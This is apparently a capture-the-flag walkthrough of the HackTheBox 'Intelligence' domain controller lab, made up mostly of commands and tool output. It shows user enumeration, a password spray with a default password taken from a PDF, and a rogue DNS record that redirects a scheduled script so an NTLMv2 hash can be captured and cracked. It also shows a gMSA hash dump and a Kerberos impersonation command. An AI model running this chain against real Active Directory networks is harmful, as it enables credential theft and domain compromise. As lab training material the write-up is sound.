Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-04 12:15:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
55478/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Domain : intelligence.htb Found two pdf on the http page
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]
└──╼ $pdfinfo 2020-01-01-upload.pdf
Creator: William.Lee
Tagged: no
UserProperties: no
Suspects: no
Form: none
JavaScript: no
Pages: 1
Encrypted: no
Page size: 612 x 792 pts (letter)
Page rot: 0
File size: 26835 bytes
Optimized: no
PDF version: 1.5
┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]
└──╼ $pdfinfo 2020-12-15-upload.pdf
Creator: Jose.Williams
Tagged: no
UserProperties: no
Suspects: no
Form: none
JavaScript: no
Pages: 1
Encrypted: no
Page size: 612 x 792 pts (letter)
Page rot: 0
File size: 27242 bytes
Optimized: no
PDF version: 1.5
┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]
└──╼ $
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]
└──╼ $/opt/kerbrute userenum --dc intelligence.htb -d intelligence.htb users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/04/21 - Ronnie Flathers @ropnop
2021/07/04 06:01:55 > Using KDC(s):
2021/07/04 06:01:55 > intelligence.htb:88
2021/07/04 06:01:55 > [+] VALID USERNAME: jose.williams@intelligence.htb
2021/07/04 06:01:55 > [+] VALID USERNAME: william.lee@intelligence.htb
2021/07/04 06:01:55 > Done! Tested 2 usernames (2 valid) in 0.160 seconds
┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]
Enumerate more documents:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
day = 1
month = 1
year = 2019
def url_ok(url):
r = requests.head(url)
return r.status_code
while year < 2022:
date = str(year) + "-" + str(month).zfill(2) + "-" + str(day).zfill(2)
url = "http://intelligence.htb/documents/" + date + "-upload.pdf"
url_status = url_ok(url)
if url_status == 200:
print(url + "\t" + "Document Exists")
day += 1
if day > 31:
day = 1
month += 1
if month > 12:
month = 1
year += 1
We found more douments nearly 100 docs, lets search for unique creators
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
└──╼ $cat users.txt
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
Let’s see the content inside the pdf files
pdftotext -layout -f 0 -l 5 2020-01-01-upload.pdf target.txt
![[Pasted image 20210704123524.png]](/assets/images/Pasted image 20210704123524.png)
Password : NewIntelligenceCorpUser9876
passwordspray with the users using crackmapexec
![[Pasted image 20210704123909.png]](/assets/images/Pasted image 20210704123909.png)
1
SMB 10.129.170.145 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
![[Pasted image 20210704124114.png]](/assets/images/Pasted image 20210704124114.png)
![[Pasted image 20210704124136.png]](/assets/images/Pasted image 20210704124136.png)
![[Pasted image 20210704124153.png]](/assets/images/Pasted image 20210704124153.png)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└──╼ $more downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "
web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Nam
e) is down"
}
} catch {}
}
1
sudo mount -t cifs -o username=tiffany.molina //10.129.170.145/Users /home/htb-tinyb0y/tiffy/
NTUSER.dat https://kalilinuxtutorials.com/regipy-python-library-registry-hives/
1
2
3
4
5
6
7
8
9
10
11
12
from ldap3 import *
server = Server('intelligence.htb', get_info = ALL, port=636, use_ssl=True)
connection = Connection(server, user='intelligence.htb\Tiffany.Molina', password='NewIntelligenceCorpUser9876', authentication=NTLM)
connection.bind()
print(server.info)
#connection.search(search_base='DC=DomainDnsZones,DC=intelligence,DC=htb', search_filter='(&(objectClass=web*))', search_scope='SUBTREE', att>
# CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
connection.search(search_base='CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb', search_filter='(objectClass=*)')
print(connection.entries)
![[Pasted image 20210704165540.png]](/assets/images/Pasted image 20210704165540.png)
https://github.com/dirkjanm/krbrelayx
1
2
3
4
5
6
7
8
9
└──╼ $python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r web6.intelligence.htb --data 10.10.14.7 10.129.3.59
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/htb-tinyb0y/my_data/Intelligence/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
1
2
3
4
5
6
7
8
9
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.129.136.121
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:d2441b695e3f32e8:4CB1E732AE7007F1973C3F24C57D3666:010100000000000085A5FAF62971D701C0C21B070187A78E000000000200080053004F0032004B0001001E00570049004E002D0037005300370059004A00560042005A003200560050000400140053004F0032004B002E004C004F00430041004C0003003400570049004E002D0037005300370059004A00560042005A003200560050002E0053004F0032004B002E004C004F00430041004C000500140053004F0032004B002E004C004F00430041004C000800300030000000000000000000000000200000C8DA2749AD49557D25F6EAC0F1B9FE3A5F2D739E28D89952449FC0A4915768C70A001000000000000000000000000000000000000900340048005400540050002F0077006500620036002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
[*] Skipping previously captured hash for intelligence\Ted.Graves
[*] Skipping previously captured hash for intelligence\Ted.Graves
Let’s crack the hash for password
1
2
3
4
5
6
7
8
9
10
hash.txt
-------------------
Ted.Graves::intelligence:d2441b695e3f32e8:4CB1E732AE7007F1973C3F24C57D3666:010100000000000085A5FAF62971D701C0C21B070187A78E000000000200080053004F0032004B0001001E00570049004E002D0037005300370059004A00560042005A003200560050000400140053004F0032004B002E004C004F00430041004C0003003400570049004E002D0037005300370059004A00560042005A003200560050002E0053004F0032004B002E004C004F00430041004C000500140053004F0032004B002E004C004F00430041004C000800300030000000000000000000000000200000C8DA2749AD49557D25F6EAC0F1B9FE3A5F2D739E28D89952449FC0A4915768C70A001000000000000000000000000000000000000900340048005400540050002F0077006500620036002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
--------------------
hashcat -m 5600 hash.txt --force
TED.GRAVES::intelligence:d2441b695e3f32e8:4cb1e732ae7007f1973c3f24c57d3666:010100000000000085a5faf62971d701c0c21b070187a78e000000000200080053004f0032004b0001001e00570049004e002d0037005300370059004a00560042005a003200560050000400140053004f0032004b002e004c004f00430041004c0003003400570049004e002d0037005300370059004a00560042005a003200560050002e0053004f0032004b002e004c004f00430041004c000500140053004f0032004b002e004c004f00430041004c000800300030000000000000000000000000200000c8da2749ad49557d25f6eac0f1b9fe3a5f2d739e28d89952449fc0a4915768c70a001000000000000000000000000000000000000900340048005400540050002f0077006500620036002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy
User: Ted.Graves Pass: Mr.Teddy
1
2
3
4
5
____ $python gMSADumper.py -u "Ted.Graves" -p "Mr.Teddy" -l 10.129.181.205 -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7
1
getST.py -spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD